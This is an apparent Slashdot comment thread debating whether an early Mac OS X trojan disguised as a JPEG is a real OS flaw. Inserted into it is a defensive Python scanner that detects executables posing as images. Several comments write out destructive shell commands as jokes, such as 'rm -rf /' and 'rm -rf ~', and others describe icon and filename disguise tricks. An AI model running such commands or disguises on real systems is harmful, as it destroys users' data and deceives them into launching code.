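    """Build the sample tree in a temp dir, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f.path}: {f.reason}")
```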

    10. Re:The vulnerability isn't always plugged in by Myopic · · Score: 1

      agreed. tell me how an administrator can have full control over his machine, yet still disallow a program from executing arbitrary commands with that administrator's explicit permission, in the form of entering your password. the software is an agent of the administrator, so anything the admin can do directly, the software can also do, with password permission.

      this trojan is more like a tool which "allows" the administrator to install the trojan on the computer.

    11. Re:The vulnerability isn't always plugged in by Beryllium Sphere(tm) · · Score: 1

      >There is no way to "fix" this without totally locking out the user

      How about not displaying executables with the icon for a JPEG?

    12. Re:The vulnerability isn't always plugged in by Overly Critical Guy · · Score: 1

      Icons can be changed because OS X is a user-customizable system. My USB drives each have a custom icon to distinguish themselves from each other.

      The difference between this and Windows is that OS X doesn't run you in a root account (root isn't even enabled without a special Terminal command), and running this will give you a password prompt.

      That immediately means it's not an OS X flaw. Anyone could write any destructive program they wanted to, but because it would require a password, that doesn't make it a virus or trojan. The difference here is someone copied and pasted the JPEG icon, so it's tricking people into clicking it. But again, the password prompt comes up, preventing any automated processes as in Windows trojans which just silently hook themselves and run.

      --
      "Sufferin' succotash."
    13. Re:The vulnerability isn't always plugged in by Overly Critical Guy · · Score: 1

      Quite true, but the point is that this isn't an OS X security flaw. The fact a password prompt pops up means OS X is already protecting you from this kind of attack to begin with and preventing any automatic hooking processes.

      Any system-damaging program could be written for any OS. But when it requires the user's entered password to run it, that means it's not a virus or a trojan at all but a user-run program.

      Every year, one of these goofy "OS X viruses" pops up, and everyone has to remind people that it pops up a password and specifically requires the user to grant it privileges to run. Contrast with the Windows world, where simply viewing a WMF automatically ran code without user intervention. That's the difference and is what makes this a non-starter in comparison.

      --
      "Sufferin' succotash."
    14. Re:The vulnerability isn't always plugged in by a.d.trick · · Score: 1

      I understand that stupid people are going to be stupid. But that doesn't mean that Apple should just give up. The vulnerability here is a result of a poorly done interface. The user thought this was an image when it was actually an executable file. In an ideal world that should never happen. I understand, if a user downloads an app and runs it, well he deserves what he gets. But when he screws up a system because the interface 'lied' to him and he thought the app was an image, that is a vulnerability.

    15. Re:The vulnerability isn't always plugged in by Anonymous Coward · · Score: 0

      Actually, you're wrong there. This is PRECISELY the sort of thing that up to date antivirus software prevents every day in the Windows universe. Welcome to the world.

      As has been already pointed out (and seemingly ignored) the vast majority of recent Win32 malware has been in the form of just this sort of self replicating trojan horse. One clever bit of Win32 malware even packs itself into a password protected ZIP (to evade gateway antivirus scanners) and mails itself (inside the ZIP) along with instructions asking the receiver to unpack with the supplied password.

      And it spreads.

      Here is the assessment of this worm: http://vil.nai.com/vil/content/v_138578.htm

      And here is the encrypted ZIP worm: http://vil.nai.com/vil/content/v_126792.htm

    16. Re:The vulnerability isn't always plugged in by Omestes · · Score: 1

      So, why allow customization of icons? That's the key area of the attack. People think they're opening an image, but its not.

      Err... As someone above you commented, it has been Mac OS functionality for 20+ years. And this is the first 'exploit', seems a pretty good record. It makes for a nicer experience, when I distribute my own .dmg, I can brand it for my program, or operation. You can brand your Windows executables too, so this isn't an odd feature, or a bad one. One wanker misuses a valid feature in a social engineering type worm, and suddenly the feature becomes insecure... Nope.

      Yes, when I was still running my (now fried, hardware, not virus) Windows box, I didn't have a virus in over 10 years, nor worm, nor whatever the kids are calling them now. Not because of intrinsic security (every OS is insecure, equally so, I would say) but because of smart management, and a healthy dose of paranoia. An exploit that is caused by user error is inevitable on every OS, wait until Linux gets a bigger user-share, then the exploits will trickle in. The Windows crowd is about as idiotic as the Mac crowd, they're both plebeian platforms, so most people have no clue as to security.

      that's exactly who you've got sitting in the chairs of home mac users. If they were computer literate, they'd likely have bought one of those other "hard to use" operating systems.

      And you lost credibility there, isn't OS flaming a bit passé by now? I wish I was as "1337" (insert derision) as you one year Linux kids! Or are we considering Windows as an "advanced" OS? Go to an IT conference and count the PowerBooks.

      --
      A patriot must always be ready to defend his country against his government. -edward abbey
    17. Re:The vulnerability isn't always plugged in by Omestes · · Score: 1

      but it is not good enough to deal with some of the more sophisticated threats of the day.

      I wouldn't call adding a thumbnail to a malicious executable 'sophisticated'.

      Basically, any program that wants to contact the internet, access files it did not create, or modify other applications should have to ask the user for that privilege.

      OS X does. It asks for your admin password. This is generally a clue that it might be doing something critical.

      like a visual clue to differentiate data and programs

      Heh... The .jpg, and .tgz extensions are a dead giveaway. Though I agree that OS X might need some form of executable extension. Only an idiot turns off extensions. Though sadly OS X and Windows do it by default.

      I also think that OS X might need to actually tell you WHY you are putting in your admin password, in terms that both the knowledgeable and typical user would understand. It does beat the "Yes" dialogue that we have come to expect from Windows, though, but there is room for improvement.

      --
      A patriot must always be ready to defend his country against his government. -edward abbey
    18. Re:The vulnerability isn't always plugged in by 99BottlesOfBeerInMyF · · Score: 1

      I wouldn't call adding a thumbnail to a malicious executable 'sophisticated'.

      i wouldn't call this malware sophisticated, either, at least not in terms of its interaction with the user.

      OS X does. It asks for your admin password. This is generally a clue that it might be doing something critical.

      This is completely wrong. If I download a new application, drag it to my Applications folder, and run it, OS X does not apply any restrictions beyond what my account has. It can do anything I can. Any new program can access the internet, monitor the keystrokes of my other apps, look at my personal files and modify them, or do anything else I, as a user, can do. It only asks for a password to modify items beyond my current privilege level, i.e. sudo.

      Heh... The .jpg, and .tgz extensions are a dead giveaway. Though I agree that OS X might need some form of executable extension. Only an idiot turns off extensions. Though sadly OS X and Windows do it by default.

      Most users don't know what file extensions apply to executables and which apply to data. Many don't know the difference between the two. A visual cue would be useful for making users aware of this. Does OS X really ship with extensions hidden by default? It has been so long since I configured a machine from scratch I don't recall. I thought they shipped with extensions visible by default though.

      I also think that OS X might need to actually tell you WHY you are putting in your admin password, in terms that both the knowledgeable and typical user would understand. It does beat the "Yes" dialogue that we have come to expect from Windows, though, but there is room for improvement.

      That is partly why the system needs finer permissions for application behaviors. That way it can have well defined, "This program is trying to access the keyboard input while another application is in the foreground. (stop it from reading keystrokes destined for other programs)(stop it from accessing keystrokes at all)(kill the program)(allow it to read typing destined for other programs)."

    19. Re:The vulnerability isn't always plugged in by aggemam · · Score: 1

      In Mac OS X, when you double click, say, a Word document for the first time, the system asks if you really wish to open it using the application "Word".

      A quick fix for the problem in case could be warning the user the first time a new application is double clicked, informing him/her that it's in fact an executable which could cause harm.

    20. Re:The vulnerability isn't always plugged in by Overzeetop · · Score: 1

      Well, I'm probably not the l33T H4x0r you expect. I started programming on an Apple II in the early 80s and managed to turn out some simple machine language programs for the 6502 in middle school. I don't do real admin anymore - I just don't have the time to keep up with it. My virus track record is merely a function of not opening stuff I don't trust. It's really not that hard. This exploit wouldn't affect me, either, if I used a Mac.

      My comment about the "computer literate" had nothing to do with OS flaming. I was simply going with the market numbers, not making an OSX is crap statement. Most people buy something else (that would be true of everything but XP). The idea, or at least the marketing, is that Macs are for people who don't understand computers. Not "Bob" don't understand, but more in an "I don't want to fool with having to set it up" understand. If you understand computers, you're willing to put up with a bit more administration, if that happens to be the case. I'd put XP in the "hard to use" category, based on my experience in getting certain things to work right. The advantage is that some of those things weren't available for the mac at that time. The dig about other OSs being Advanced was not part of my comment.

      Personally, if there were no cost to switch, and I could forget all the admin I have to do on my systems, I'd be happy to switch to something else. Unfortunately, it would probably mean several thousand dollars of downtime and I'd probably have to repurchase a good portion of my twenty grand in software. It's just not going to be in the budget. It's still more cost effective to waste two or three thousand dollars of time a year on a known evil than spend the cash to change, and hope that there are no gremlins on the other side. Having been through OS changes at former employers, I'm still waiting for that advertised smooth transition and TCO to materialize.

      --
      Is it just my observation, or are there way too many stupid people in the world?
    21. Re:The vulnerability isn't always plugged in by Omestes · · Score: 1

      Sorry then for the semi-troll. It sounded like an elitist comment at the time. God bless the internet-text-medium, breeding misunderstanding for 30 years.

      Until a bad power-supply fried my mobo/chip I did use mostly XP for business, and heavy use. The switching thing was mostly after being pissed off (3rd PSU to act up in my system), rather than some choice for simplicity.

      If my PC was still up and running, I would probably put as much time on it as I do on my power-book, because it can do more, though with much cussing and fiddling (and hardware costs). Linux, right now, is just too much of a hassle, and has less viable software than OS X (sorry, the Gimp doesn't cut it for business graphics, or most professional photography, nor does Oo.org).

      Tangent aside, about 1/4th of Mac users are "techies on vacation", but about half are about as bottom of the barrel as your general XP user. So you are right there. Apple, though, seems to have less of a history of idiot bugs, it is more difficult to propagate "free pr0n" worms because of the nice (BSD) underpinnings of the OS itself. It would be interesting to see a widespread OS X worm/trojan/virus go out, just to see what the reaction would be, ditto for Linux, of course. Some actual data on the idiocy of users on the alt-OS scene would be interesting.

      Doubtfully (and thankfully), it won't happen for quite awhile, though. So all else is speculation.

      I do think, though,

      --
      A patriot must always be ready to defend his country against his government. -edward abbey
    22. Re:The vulnerability isn't always plugged in by Anonymous Coward · · Score: 0
      If you understand computers, you're willing to put up with a bit more administration, if that happens to be the case. I'd put XP in the "hard to use" category, based on my experience in getting certain things to work right
      I get it... windows breeds linux masochists, who like to fuck about all day making their computer work properly; while mac users use mac to avoid that shit and do real work?
    23. Re:The vulnerability isn't always plugged in by Anonymous Coward · · Score: 0
      Never underestimate the power of the incompetence of 20% of your userbase.

      Then Apple should come out with the idiotproofMac which has a heuristic software engine that detects actions like this. When the user makes a mistake, utilize negative reinforcement by spraying something like Raid from the iSight into their face or electrifying the keyboard and giving the user a mild shock. That will learn um really good.

    24. Re:The vulnerability isn't always plugged in by WhiteWolf666 · · Score: 1

      If they were computer literate, they'd likely have bought one of those other "hard to use" operating systems.

      I agree with most of what you say, but "ouch".

      I think I'm pretty computer literate. All my home desktops run linux, as do my family's, and my business computers. But I use a powerbook as my portable, and am currently buying a top of the line G5 powermac for Final Cut HD stuff, 'cause I think it's the best software for the job.

      Not all mac users are illiterate :) Some of us just like a snazzy package on a unixy system, and the extra $$ doesn't matter because it's really small compared to the money we'll make off the machines. Oh, and they are easier to maintain ;-)

      --
      WhiteWolf666 an exBush supporter. All you new-school,compassionate,save the children Republicans can rot in hell
    25. Re:The vulnerability isn't always plugged in by njyoder · · Score: 1

      Don't be a hypocrite. They've been whining about implementing this functionality for windows forever. I'm not even talking about proper sandboxing/privilege separation (restricted to running as the current user isn't sufficient since that's all you need to spread and cause havoc--plus most users blindly type in prompts).

      I'm talking about how Outlook Express, years ago, disabled the ability to run executables from e-mails by default. IT EXPLICITLY WARNS YOU. In fact, MSIE and other windows programs have added big warning windows saying stuff like 'this is an executable, it may be harmful, blah blah blah blah.' It prevents the users from doing it by default. It's trivial to add a warning for this and enable it by default. Hello, with the right policy settings on the computer, you can just flat out prevent the user from doing it (ideal for computers at an organization). Just because it's a wetware vulnerability doesn't mean you can't compensate for it.

    26. Re:The vulnerability isn't always plugged in by Anonymous Coward · · Score: 0

      20%? i wish i had your userbase :)

  37. First of many by aka_big_wurm · · Score: 1

    As the Mac user base goes up so will mal-ware. It doesn't help that people will be running cracked versions of OSX on Windows boxes.

  38. You can't make a .app look like a .jpg in OS X by sjonke · · Score: 2, Insightful

    I tried to create an application that had a name of test.jpg.app and was pleased to find that, at least in Mac OS X 10.4.5, when you try to do this, the Finder displays the entire name, including the entire extension ".jpg.app", even though normally the ".app" portion is hidden. Take out the ".jpg" and the ".app" goes missing again. The "hide extension" option in the get info window is disabled when you have a name like ".jpg.app". So, it isn't quite so easy to disguise an application as a jpeg in Mac OS X. Of course not everyone is going to know what the .app means and so it being visible won't help them. Then again, if that's the case, they probably don't know what the .jpg means either!

    I also tried doing this with a .term file, which was set to hide the extension. When I made the name test.jpg.term, the full name was displayed including ".term", and the "hide extension" option was disabled.

    --
    --- What?
    1. Re:You can't make a .app look like a .jpg in OS X by Anonymous Coward · · Score: 0

      Plain executables without .app bundles need no extension at all. Underneath all the Mac pretties, it's still Unix.

    2. Re:You can't make a .app look like a .jpg in OS X by sjonke · · Score: 1

      If you take a "plain executable" and give it an extension of .jpg, it will then in fact look like a jpeg (the file icon changes to that), but when you open this trojan file, it just attempts to open it in Preview, because it in fact thinks it's a jpeg, and Preview just says it can't open it. That's not going to do it either.

      --
      --- What?
    3. Re:You can't make a .app look like a .jpg in OS X by Anonymous Coward · · Score: 0

      If you take a "plain executable" and give it an extension of ".jpg ", it will still work as an executable, the name will look like an innocent piccy, and a quick paste will make it look happy and innocent too.

    4. Re:You can't make a .app look like a .jpg in OS X by sjonke · · Score: 1

      Perhaps I don't know what you mean by a "plain executable", but as noted, I tried it and it didn't work. I tried to do this with "cp" in /bin and while making the name be "cp.jpg" did make the file look like a jpeg, it also caused the mac to try to open the file in Preview, as a jpeg, which failed because it isn't a jpeg. It didn't execute it.

      --
      --- What?
    5. Re:You can't make a .app look like a .jpg in OS X by Anonymous Coward · · Score: 1, Insightful

      You didn't understand what I wrote. You need to include a space at the end of the file name, use quotes if you use the shell. In Finder the name will look like it has a .jpg extension, even though it really has ".jpg " as its extension.

      Pasting refers to fixing up the icon.

    6. Re:You can't make a .app look like a .jpg in OS X by Anonymous Coward · · Score: 0

      Ok, now just copy the binary and don't rename it to .jpg (remember that Finder hides extensions by default). IIRC, if you use Get info you can paste any icon there, including the generic picture icon. Double-clicking would execute the binary and not open Preview. This would be good enough to fool most casual users.

    7. Re:You can't make a .app look like a .jpg in OS X by sjonke · · Score: 1

      Ah, now I see, and it does work. Good point.

      --
      --- What?
    8. Re:You can't make a .app look like a .jpg in OS X by m50d · · Score: 1

      But if you're hiding extensions, test.jpg and test.app will look the same. So this won't save users who are hiding extensions.

      --
      I am trolling
    9. Re:You can't make a .app look like a .jpg in OS X by Overly+Critical+Guy · · Score: 1

      Plain executables don't even run from the Finder. Finder wants well-formed .app bundles.

      --
      "Sufferin' succotash."
    10. Re:You can't make a .app look like a .jpg in OS X by Overly+Critical+Guy · · Score: 1

      They're saved by the password prompt. That's the point where the user is the one giving the permission for the app to run, meaning it's not the fault of the OS. Regardless, I have a feeling Apple will modify the text of the prompt to more greatly clarify that an executable application is asking for permission and it's not just OS X asking for a password for something.

      --
      "Sufferin' succotash."
    11. Re:You can't make a .app look like a .jpg in OS X by Mark+Hood · · Score: 1

      This has been done for a while - I thought that any application with a dot in the name (other than the terminating .app) should show up as try.jpg.app - precisely to avoid this scenario from happening.

      In fact, it's not everything. I created an app, and renamed it test.jpg, and it stuck .app on the end. Same with .txt .doc .dmg .exe .avi .mov and whatever else I could think of.

      When I tried with .xxx it stayed as .xxx - i.e. OS X didn't add the .app suffix, but then if you're expecting a .xxx file to be a document, you might well be disappointed!

      Sounds reasonable to me - any registered document type cannot be used as the last characters on a file name for an application...

      Of course, as other posters have pointed out you can use the old OS 9 'Creator/Type' codes to create a runnable application without a .app extension. Not sure what happens then...

      Don't forget, there's nothing to stop me telling you to download this new whizzy P2P software, and when you unzip the archive it's a shell script saying 'rm -rf /' or (if you don't want the password prompt) 'rm -rf ~'. Doesn't make the platform insecure any more than doing the same with a batch file on Windows that does 'deltree c:\'

      Be honest, how many of you have tried software from a site you don't trust 100%? Despite all the warnings, and what you know? Exactly. People will always fall for trojan horses - on any architecture or operating system.

      Mark

      --
      Liked this comment? Why not buy me something nice
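      The sub-thread above settles on three ways a plain binary can pass for a picture in the Finder: a name padded with a trailing space (".jpg "), a pasted custom icon on an executable with no extension at all, and an image extension buried inside a bundle name ("test.jpg.app"). The following is an added example written for this page, not code from any poster or from Apple; it is a small defender-side scanner that checks a directory for those tells by looking at the name, the execute bits and the first bytes of each file, instead of trusting the icon. The file names and contents it builds in a temporary directory are constructed samples, not the real trojan.

```python
"""Added example: flag files whose name claims an image but whose name
construction, mode bits or leading bytes say "executable".  Constructed
samples only; nothing here is the trojan from the article."""
import tempfile
from pathlib import Path

IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".tif", ".tiff", ".bmp"}

# Magic numbers of executable containers a picture should never start with.
MACHO_MAGICS = {
    b"\xfe\xed\xfa\xce",  # Mach-O 32-bit, big-endian
    b"\xce\xfa\xed\xfe",  # Mach-O 32-bit, little-endian
    b"\xfe\xed\xfa\xcf",  # Mach-O 64-bit, big-endian
    b"\xcf\xfa\xed\xfe",  # Mach-O 64-bit, little-endian
    b"\xca\xfe\xba\xbe",  # Mach-O universal ("fat") binary
}


def sniff(head: bytes) -> str:
    """Identify the container from its first bytes; 'unknown' if nothing matches."""
    if head[:4] in MACHO_MAGICS:
        return "mach-o"
    if head[:4] == b"\x7fELF":
        return "elf"
    if head[:2] == b"#!":
        return "script"
    if head[:3] == b"\xff\xd8\xff":
        return "jpeg"
    if head[:8] == b"\x89PNG\r\n\x1a\n":
        return "png"
    if head[:6] in (b"GIF87a", b"GIF89a"):
        return "gif"
    return "unknown"


def split_ext(name: str):
    """Return (raw extension, normalised extension); raw keeps any padding."""
    dot = name.rfind(".")
    if dot <= 0:
        return "", ""
    raw = name[dot:]
    return raw, raw.strip().lower()


def inspect(path: Path) -> list:
    """Return the reasons this entry looks like a disguised executable (empty if none)."""
    findings = []
    raw_ext, ext = split_ext(path.name)

    # A .app bundle whose name, minus ".app", still carries an image extension.
    if ext == ".app" and path.is_dir():
        _, inner = split_ext(path.name[: -len(raw_ext)])
        if inner in IMAGE_EXTS:
            findings.append("image extension inside .app bundle name")
        return findings

    if ext not in IMAGE_EXTS or not path.is_file():
        return findings  # only entries that claim to be pictures are checked

    if raw_ext != raw_ext.strip():  # the ".jpg " trick: whitespace hides in the name
        findings.append("extension padded with whitespace")
    if path.stat().st_mode & 0o111:  # pictures have no business being executable
        findings.append("executable bit set")
    with path.open("rb") as fh:
        kind = sniff(fh.read(8))
    if kind in ("mach-o", "elf", "script"):
        findings.append(f"content is {kind}, not an image")
    return findings


def scan_dir(root) -> dict:
    """Map each suspicious entry name directly under root to its findings."""
    results = {}
    for entry in sorted(Path(root).iterdir()):
        found = inspect(entry)
        if found:
            results[entry.name] = found
    return results


def build_sample_dir() -> str:
    """Create constructed samples in a fresh temp directory and return its path."""
    root = Path(tempfile.mkdtemp(prefix="disguise_demo_"))
    # Clean: JPEG header, no execute bit.
    (root / "holiday.jpg").write_bytes(b"\xff\xd8\xff\xe0" + b"\x00" * 12)
    # Trailing-space name, Mach-O magic, mode 755 (constructed, not a real binary).
    fake = root / "leopard_screenshot.jpg "
    fake.write_bytes(b"\xcf\xfa\xed\xfe" + b"\x00" * 12)
    fake.chmod(0o755)
    # Harmless shell script wearing a picture's name.
    script = root / "funny.jpg"
    script.write_bytes(b"#!/bin/sh\necho constructed sample\n")
    script.chmod(0o755)
    # Bundle directory whose name ends in ".jpg.app".
    (root / "cute.jpg.app" / "Contents" / "MacOS").mkdir(parents=True)
    return str(root)


if __name__ == "__main__":
    for name, why in scan_dir(build_sample_dir()).items():
        print(repr(name), "->", "; ".join(why))
```

      Run it as-is to see the three constructed fakes reported and the clean JPEG left alone; point scan_dir at a real Downloads folder to check actual files. The magic-number check is the part a pasted icon cannot defeat, because the icon lives in Finder metadata while the Mach-O header lives in the file itself.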
  39. my own new most vicious trojan script by Anonymous Coward · · Score: 0
    (script of Trojan)

    Hey User, Read and Do The Following:
    open new finder window -> select all -> move to trash -> select "empty trash" -> click OK
  40. If it's anywhere, it will be through Bonjour by simong · · Score: 1

    Bonjour is a good implementation of zeroconf and will be one of the ways forward for making networking transparent in the future. However, at this stage in its development it still seems to me to be insecure and experimental in its wide area applications, perhaps more in its undiscovered potential than its current abilities. I suspect that to make it secure it's going to need a whole new level of content based security. I hope someone at Apple takes this as a warning. Oh sorry, what am I saying?

    1. Re:If it's anywhere, it will be through Bonjour by Overly+Critical+Guy · · Score: 1

      As long as OS X pops up a password prompt any time a program tries to be malicious, it's already protecting you from abuses. When the user gives the program permission to run by supplying their password, that makes it a user-run program and not a system flaw exploit.

      --
      "Sufferin' succotash."
  41. Dang It! by JoeCommodore · · Score: 0

    I had to change my signature because of this. :-/

    --
    "Enjoy what you're doing! If it becomes drudgery, you're doing it wrong!" - Jim Butterfield
  42. Bad article title by Lemmingue · · Score: 0

    OSX should be written together, not OS X. The title can be read "First OS vs virus?". We know this battle is already lost.

    ======
    Am I new here?

    1. Re:Bad article title by cailyoung · · Score: 2, Informative

      Except that the product name is OS X, not OSX.

    2. Re:Bad article title by Anonymous Coward · · Score: 0

      OSX should be written together, not OS X. The title can be read "First OS vs virus?". We know this battle is already lost.

      ======
      Am I new here?


      No, you're not new, you're just wrong :) "X" is not shorthand for "vs."-- "vs." itself is shorthand for "versus". "X" might be shorthand for multiplication or something, but as far as I know, "X" doesn't have any interpretation as "versus" in normal usage. (Notwithstanding the other folks in this thread, who pointed out that the correct product name really is "Mac OS X" as well :)

  43. YHBT by maeddi · · Score: 0

    YHL GBTW

  44. Let me get this straight... by ShadowDawn · · Score: 3, Insightful

    If I write:

    #include <stdio.h>

    int main(void)
    {
            (void) printf("Hello World\n");
            return (0);
    }

    and also included a couple lines to 'rm -rf /User/Home'....

    Then I e-mailed or IM'd a person the executable, then asked them to decompress it, double-click on it, and laugh, that would be Mac OS X's first virus/trojan? Ohh wait, I need to associate a pretty icon to it too.....

    As much as this author would like to claim they are the first, I think the programmers at Apple were the first ones to do this with their "Disk Utility" that a user has to click on to 'newfs' or your Windows users 'format' your hard drive.

    I can not believe this made Slashdot....

    1. Re:Let me get this straight... by Anonymous Coward · · Score: 0

      LMAO. Did you give it a .piff extension?

    2. Re:Let me get this straight... by Overly+Critical+Guy · · Score: 1

      You forgot the most important part. OS X brings up a password prompt. That effectively stops any destructive program in its tracks and any automated hooking processes. On a secure system that requires the user to enter a password to grant the program permission to do what it does, that changes it from a virus/trojan to a mere user-run program.

      Social engineering is a whole other issue from actual OS flaws (like the WMF vulnerability in Windows), but in this case OS X is still protecting you by prompting for your permission for this app to run.

      Regardless, I imagine in the next OS X Tiger update, Apple will change the text of the password prompt to say "This program needs your password to run" instead of whatever it says now (I think it's "OS X needs your password") to make sure people realize it's an executable asking for permission.

      --
      "Sufferin' succotash."
    3. Re:Let me get this straight... by Triple+Click · · Score: 1

      Whew. I'd be okay, because my name isn't Home. :)

    4. Re:Let me get this straight... by geekoid · · Score: 1

      Yes, because adding a prompt of some sort before executing will really help.

      Hint: The person clicked on it, they WANT to run it.

      --
      The Kruger Dunning explains most post on /. http://en.wikipedia.org/wiki/Dunning%E2%80%93Kruger_effect
    5. Re:Let me get this straight... by Overly+Critical+Guy · · Score: 1

      If a password prompt is appearing for a supposed JPEG, you know something is up. Safari already warned it was an application in the first place. That prompt means OS X is a secure system that requires the user's permission before running any automated processes.

      --
      "Sufferin' succotash."
    6. Re:Let me get this straight... by Ilgaz · · Score: 1

      If you manage to code an input manager that automatically, without your intervention, sends it to your iChat buddies (entire .mac base), it is a virus/trojan whatever. It propagates.

      You really think windows viruses are geniusly hand coded, hiding in video card memory ASM miracles?

      Think again, you should consider yourself "lucky" if you find a "C" virus anymore.

      I think Apple fanboys are the excellent allies of future OS X viruses. Trojans.. Whatever you call it.

  45. WOW !!!... by mAIsE · · Score: 0

    well if this is the only viri i need to worry about I am glad i use Mac OS X. How many viri does windows collect in only one month ? ....

  46. just a hype ? by richlv · · Score: 1

    so, having "windows_vista_final_screenshots.zip" that would contain an executable with some icon would be a virus, too?

    what about "kde_4_screenshots.tgz" with similar payload as this one ?

    (note that there is no way to run the executable automatically and, it seems that it is not self-propagating in any way)

    --
    Rich
  47. Five stages of grief by sg3000 · · Score: 5, Funny
    I think this is a bit overblown. It sounds like a Trojan Horse, not a virus. But the originally posted messages are kind of funny. Has anyone else noticed that if you look throughout the Mac OS Rumors threads, you can find examples that follow the five stages of grief?

    1. Denial and isolation
    Is this another non story just so we can toss a non story at people who argue that a Mac will be just as crap as windows given time and enough crazy automation in our email clients?

    2. Anger
    Oh God, shut up. The fact that you worked at an Apple Store means nothing, get over yourself. "At least a dozen people" HAHA yeah OK, you want to tell me you didn't pull that completely out of your butt?

    3. Bargaining
    if anyone thinks that they can isolate it and reverse engineer it or anything like that i will be happy to give you the mirrored link

    4. Depression
    that is seriously depressing. i am officially shaken from my nice little warm fuzzy macintosh lull.

    5. Acceptance
    We all knew this day would come.
    It's ok, although some of you are a bit shocked, this thing was eventually going to happen. I just hope that Apple will help stop these kinds of things from happening. Safari already tells us when we download a program, and even an .exe, maybe Apple just has to add what Safari looks for when we download it. That would hopefully prevent this from ever happening again.

    I think with the appropriate counseling, the MacOSRumors.com community will be just fine.
    --
    Insert simplistic political, ideological, or personal proselytization here.
  48. Just finished my new OSX Virus. by xabi · · Score: 3, Funny

    #!/bin/sh
    rm -rf /

    --
    Check populicio.us
    1. Re:Just finished my new OSX Virus. by Anonymous Coward · · Score: 0

      I've always wondered why the writers of rm don't put up a warning to forbid any non-root users from running this command.

      Yes, I know any luser who runs this will not kill the box, but only delete their home drive. I know that any user who runs this after making it executable deserves what they get.

      But how hard is it to write a special case if the target is / to only allow this to be run by the root user and then require 2 prompts to confirm.

      That way anyone trying this trick will need to do rm -rf ~ which is much less potentially damaging when run as root.

    2. Re:Just finished my new OSX Virus. by GodotJr · · Score: 1

      Test it on your machine! Test it on your machine! Show us the screen grab afterwards!

      --
      History doesn't repeat itself, but it rhymes quite often. -- Mark Twain
  49. The Latest Scoreline by SilentOneNCW · · Score: 2, Funny

    Mac OS X: 1
    Windows XP: 4,234,278,247,295 and counting

    Yup, now that OS X isn't secure, we'd better migrate back to Windows!

    1. Re:The Latest Scoreline by geekoid · · Score: 1

      Yeah, that's valid. Except 90% of those windows viruses are basically the same thing.

      If I took this worm, and changed the jpeg, would you consider that the same thing as the current one, or count it as a separate one?

      Yes BSD is more secure, but as Apple becomes more mainstream, you had better keep an eye on the game, and not just on the specific issue.

      --
      The Kruger Dunning explains most post on /. http://en.wikipedia.org/wiki/Dunning%E2%80%93Kruger_effect
  50. Really new? by Metaplasmus · · Score: 2, Informative

    Even in the realm of OS X, is this exploit really all that new or exciting? Not having gotten my hands on a copy of this, I don't know how it works, but it seems similar to the proof-of-concept from nearly two years ago, which exploited issues in the Finder with handling file extensions vs. type/creator codes (IIRC, the proof was an application with type code 'APPL' and extension .mp3, which made the Finder display it as an MP3 but treat it as an application when clicked).

    1. Re:Really new? by Pfhreak · · Score: 1

      Not having gotten my hands on a copy of this, I don't know how it works, but it seems similar to the proof-of-concept from nearly two years ago, which exploited issues in the Finder with handling file extensions vs. type/creator codes (IIRC, the proof was an application with type code 'APPL' and extension .mp3, which made the Finder display it as an MP3 but treat it as an application when clicked).

      Not quite. MP3Concept, like the one from the article (JPGConcept? ;-), used the common icon for a particular file type as the application's custom icon. When MP3Concept was all the rage, I tested this by changing my default MP3 icon. (I think I just added a small, red triangle in one corner, just something that was easily visible.) I had to log out and back in for the changed icon to propagate, but once it did, all of my legitimate MP3s had the updated icon, while "virus.mp3" (MP3Concept) still had the un-modified icon. So, no, Finder wasn't getting confused about what type of file it was. Finder knew it was a program, and not an MP3, but the custom icon tricked the user into thinking it was an MP3. The reason iTunes would play an MP3 when you double-clicked on "virus.mp3" was because MP3Concept was programmed to tell iTunes to play an MP3 hidden in MP3Concept.

      --
      The U.S. Constitution needs to be ammended with a "separation of business and state" clause.
  51. Re:I call Dupe by hunterx11 · · Score: 1

    Apple made it so that the .app extension cannot be hidden, and so that one is warned before running any application for the first time, probably as a direct result of the mp3 trojan. A user being allowed to execute code he chooses to may be a vulnerability, but it isn't one to be "fixed."

    --
    English is easier said than done.
  52. GPS viruses by Anonymous Coward · · Score: 0

    what's next, viruses spread by GPS satellites?

  53. Kipling-lovers must wonder... by xactuary · · Score: 0
    Just how did Leopard get into this spot?

    --
    Say hello to my little sig.
  54. HIV is not a virus... by Anonymous Coward · · Score: 1, Funny

    You cannot be infected by this unless you do all of the following:

    1) Are somehow hooked-up with or bringing home the "infected chick"

    2) Un-click the bra strap and pants button to en-naked the chick

    3) Insert dong into resulting hole to "fill" it ...and then for most users, you must also forget to put on the "protector".

    You cannot simply "catch" the virus. Even if you do bring home the "infected chick", you cannot be infected unless you expose the hole, and then fill it.

  55. How to make a .app look like a .jpg in OS X by mh101 · · Score: 0, Redundant

    Step 1. Command-click on a jpeg file and select Get Info.

    Step 2. Click on the jpeg icon in the top corner, then select Edit > Copy from the Finder menu.

    Step 3. Command-click on a .app file and select Get Info.

    Step 4. Click on the application's icon, then select Edit > Paste from the Finder menu.

    Step 5. ???

    Step 6. PROFIT!

    --
    Duct tape is like the Force. It has a light side, a dark side, and it holds the universe together.
    1. Re:How to make a .app look like a .jpg in OS X by Anonymous Coward · · Score: 0

      Yes, you've discovered that application can have custom icons, good for you. But, as he said, it will still be "File.jpg.app". (And it's control-click not command-click.)

  56. Re:I call Dupe by RyuuzakiTetsuya · · Score: 0, Offtopic

    A) New variant of that.
    B) If this IS a dupe that means that the virus has duplicated and spread!

    --
    Non impediti ratione cogitationus.
  57. Mod parent funny or overrated by grimJester · · Score: 1

    Come on. The parent post is a joke, not provocative in any way. Use +1 funny or -1 overrated mods, not troll or flamebait.

  58. Nope. by MarcQuadra · · Score: 1

    Sorry, but the type of exploits we really fear (remote arbitrary code execution) ARE platform specific. One of the reasons I use a PPC as my gateway instead of an X86 is because on the off chance I am running a service with a vulnerability, the attackers will most likely overflow my buffers with X86 code that won't execute on my box.

    Could the hacker just as easily change to PPC and attack me just as hard? Yes, but most don't.

    When you take advantage of a buffer overflow, you're injecting machine code or bytecode into an unchecked buffer, overwriting the next piece of executable code in memory. The payload for this type of attack IS platform specific, unless you're attacking a bytecode-interpreting machine, like the Java VM.

    --
    "Sometimes, I think Trent just needs a cup of hot chocolate and a blankie." -Tori Amos on Nine Inch Nails
    1. Re:Nope. by iBod · · Score: 1

      True, but surely the injected code needs to do something meaningful with the running environment (OS and Apps) unless it just wants to lock up or crash the machine.

  59. Thank GOD there is finally a virus by Danathar · · Score: 1

